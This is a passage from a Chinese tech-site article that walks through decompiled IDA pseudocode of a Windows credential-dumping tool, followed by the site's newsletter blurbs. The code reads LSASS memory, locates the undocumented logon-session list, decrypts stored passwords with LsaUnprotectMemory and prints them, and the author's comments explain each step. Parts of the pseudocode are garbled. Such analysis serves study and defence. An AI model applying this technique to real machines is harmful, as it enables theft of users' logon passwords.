　　_chkesp(&t == &t, status1, &v48); for ( i = 0; i & ++i ) { LogonSessionNow = ListEntry + 8 *// 根据这里可以知道 output_name_(pLsaGetLogonSessionData, pLsaFreeReturnBuffer, ListEntry + 8 * i); // 这里输出登陆用户名 进入output_name_session： int __cdecl output_name_session_real(int (__stdcall *pLsaGetLogonSessionData)(_DWORD, _DWORD), int (__stdcall *pLsaFreeReturnBuffer)(_DWORD), int LogonSessionNow) { // eax@1 int status1; // eax@1 char v6; // [sp+0h] [bp-50h]@1 char v7; // [sp+Ch] [bp-44h]@1 int LogonSessionD // [sp+4Ch] [bp-4h]@1 int v9; // [sp+50h] [bp+0h]@1 memset(&v7, -, 0x44u); status = pLsaGetLogonSessionData(LogonSessionNow, &LogonSessionData); _chkesp(&v6 == &v6, status, &v9); printf("UserName: %S\n", *(LogonSessionData + 16)); printf("LogonDomain: %S\n", *(LogonSessionData + 24)); status1 = pLsaFreeReturnBuffer(LogonSessionData); return _chkesp(&v6 == &v6, status1, &v9); } 这里用了之前查找的LsaGetLogonSessionData和LsaFreeReturnBuffer，输出登陆名和。 status3 = ReadProcessMemory(Lsass, l_LogSessList, List, 0x100u, &NumberOfBytesRead); // 这里读取之前获取的那个不明地址内容到List _chkesp(&t == &t, status3, &v48); while ( List[0] != l_LogSessList ) { status4 = ReadProcessMemory(Lsass, List[0], List, 0x100u, &NumberOfBytesRead); _chkesp(&t == &t, status4, &v48); First = &List[4]; if ( List[4] == *LogonSessionNow ) { if ( First[1] == *(LogonSessionNow + 4) ) // 这个First[1]看着太别扭了，实际上就是比较List[4]和枚举到的会话LUID值// 这里可以知道之前那个不明地址+0xc29c是个列表 } } if ( List[0] == l_LogSessList ) { printf("Specific LUID NOT found\n"); } else { nSize = 0; v28 = (offset_one + First); nSize = *(offset_one + First + 2); Base = *(offset_one + First + 4); // 还是使用了First，不要忘记First是从当时那个不明地址处读取的值 memset(Buffer2, 0, 0x100u); status2 = ReadProcessMemory(Lsass, Base, Buffer2, nSize, &NumberOfBytesRead); _chkesp(&t == &t, status2, &v47);// 这里读到加密之后的密码。整个流程就清楚了，使用LsaEnumerateSessions获取LUIDs，与之前通过特征码找到的l_LogSessList结合找出密码。l_LogSessList保存了密码的长度和存放地址以及会话LUID，是个重要的未公开结构体。 status5 = (LsaUnprotectMemory)(Buffer2, nSize); _chkesp(&t == &t, status5, &v47); printf("password: %S\n\n", Buffer2); }
　　后面是一些释放dll和内存的工作，不再赘述。程序和IDA右键图片可以得到。
相关文章：
[ 责任编辑：小石潭记 ]
社会工程学攻击在近年来的一些网…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte